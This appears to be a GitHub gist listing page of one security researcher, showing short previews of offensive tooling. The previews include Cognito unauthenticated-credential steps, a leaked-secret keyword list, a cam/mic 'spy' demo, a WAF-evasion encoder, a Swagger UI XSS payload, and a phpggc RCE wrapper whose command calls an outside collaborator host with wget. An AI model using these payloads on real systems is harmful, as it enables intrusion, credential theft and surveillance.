-
Generate temporary AWS credentials using unauth user 1.1 - Get the poolId 2.1 - IdendityID 3.1 - Use the following command on aws-cli "example" $ aws cognito-identity get-id --identity-pool-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"
3.2 - Use the following command to get aws credentials $ aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"
ππππ πππͺπ₯π incogbyte
π
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| RED='\033[0;31m' | |
| GREEN='\033[0;32m' | |
| BLUE='\033[0;34m' | |
| YELLOW='\033[1;33m' | |
| NC='\033[0m' | |
| SEARCH_FILTER="" | |
| INCLUDE_SYSTEM=false |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .mlab.com+password | |
| WFClient+Password+extension:ica | |
| access_key | |
| access_token | |
| admin_pass | |
| admin_user | |
| algolia_admin_key | |
| algolia_api_key | |
| alias_pass | |
| alicloud_access_key |
incogbyte
/ capture.html
Last active
July 3, 2025 12:17
Cam + Mic Capture Demo - Camera and Microphone Spy Chromium Browsers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8" /> | |
| <title>Cam + Mic Capture Demo</title> | |
| <style> | |
| body { font-family: system-ui, sans-serif; padding: 1rem; } | |
| #video { max-width: 350px; border-radius: 8px; background: #000; } | |
| #controls { margin-top: 1rem; } | |
| button { padding: .6rem 1rem; margin-right: .5rem; } |
incogbyte
/ encoding_waf_evasion.py
Created
January 27, 2025 11:28
Python script that generates diff encodings techniques. Those techniques can be used to bypass HTTP WAF.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib.parse | |
| """ | |
| By @incogbyte | |
| Python script that generates diff encodings techniques. | |
| Those techniques can be used to bypass HTTP WAF. | |
| """ | |
| def generate_encodings(input_string): | |
| encodings = {} |
incogbyte
/ swagger-xss.yaml
Last active
November 8, 2023 12:59
https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Classic API Resource Documentation | |
| description: | | |
| <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form> | |
| version: production | |
| basePath: /JSSResource/ | |
| produces: | |
| - application/xml |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Git clone this tool https://github.com/ambionics/phpggc | |
| # phpggc wrapper that automatically generates payloads for RCE gadgets | |
| function="system" | |
| command="wget http://your.burpcollaborator.net/?" | |
| # modify the options below depending on your use case | |
| options="-a -b -u -f" |
incogbyte
/ words_from_subs.py
Created
June 7, 2023 12:24
extract words from subdomains to make a wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| import sys | |
| def extract_subdomains(filename): | |
| subdomains = set() | |
| pattern = r"(?:https?://)?(?:www\.)?([^.]+\.[^.]+)" | |
| with open(filename, 'r') as file: | |
| for line in file: | |
| match = re.search(pattern, line) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1 | |
| 10 | |
| 11 | |
| 12 | |
| 13 | |
| 14 | |
| 15 | |
| 16 | |
| 17 | |
| 18 |
incogbyte
/ gist:b03f7794a8e2d2e854bb1539d8c64d51
Created
May 11, 2023 22:28
FFUF list of urls and save them into a file by name of the domains
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ## Author: incogbyte | |
| ## Usage: ./ffuf_script.sh input.txt | |
| extract_domain() { | |
| echo "$1" | awk -F/ '{print $3}' | |
| } |
NewerOlder